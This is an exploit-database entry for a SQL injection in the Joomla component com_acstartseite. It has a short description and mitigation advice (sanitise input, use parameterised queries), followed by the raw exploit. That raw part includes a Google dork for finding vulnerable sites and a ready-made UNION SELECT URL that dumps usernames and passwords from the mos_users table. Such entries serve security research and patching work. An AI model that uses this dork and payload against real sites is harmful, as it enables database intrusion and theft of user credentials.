header-logo
Suggest Exploit
vendor:
N/A
by:
AtT4CKxT3rR0r1ST
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_acstartseite Sql Injection Vulnerability

A vulnerability exists in the Joomla component com_acstartseite, which allows an attacker to inject malicious SQL queries into the application. The vulnerability is triggered when the application fails to properly sanitize user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability by crafting a malicious SQL query and sending it to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Developers should always sanitize user-supplied input before using it in an SQL query. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Joomla Component com_acstartseite Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Home : www.sec-attack.com/vb [Sec Attack Team]
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : inurl:"com_acstartseite"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_acstartseite&Itemid=null[SQL]〈=de


www.site.com/index.php?option=com_acstartseite&Itemid=null+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users〈=de


####################################################################